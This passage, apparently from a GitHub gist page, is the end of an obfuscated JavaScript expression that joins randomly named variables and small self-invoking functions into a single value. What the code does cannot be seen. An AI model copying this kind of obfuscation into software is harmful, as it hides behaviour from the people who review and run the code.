return Iq;
}()) + FWe(MAp7), Aq5 + DOo6(Fl) + (function GYg2() {
return FRt;
}()) + Ex5(UEo6) + LCg6 + WZg(Dz3) + Jw + HUv + Zh + BEi(DNw) + (function YVj() {
return Yf4;
}()) + Az4 + Dw];
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment